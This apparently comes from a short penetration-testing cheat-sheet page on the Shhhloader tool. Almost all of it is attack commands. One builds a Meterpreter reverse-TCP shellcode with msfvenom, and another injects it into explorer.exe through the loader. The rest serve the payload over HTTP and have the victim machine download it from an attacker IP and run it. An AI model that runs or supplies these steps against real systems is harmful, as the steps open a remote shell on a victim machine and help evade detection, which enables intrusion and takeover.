SHHHHLOADER
https://github.com/icyguider/Shhhloader
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.130 LPORT=8080 -f raw -o tcp.bin
./Shhhloader.py tcp.bin -p explorer.exe
python3 -m http.server 80 #transfer the file on the victim machine
open powershell on the victim machine:
iwr http://<attacker_IP>/file.exe -Outfile .\file.exe
run the file: .\file.exe
Last updated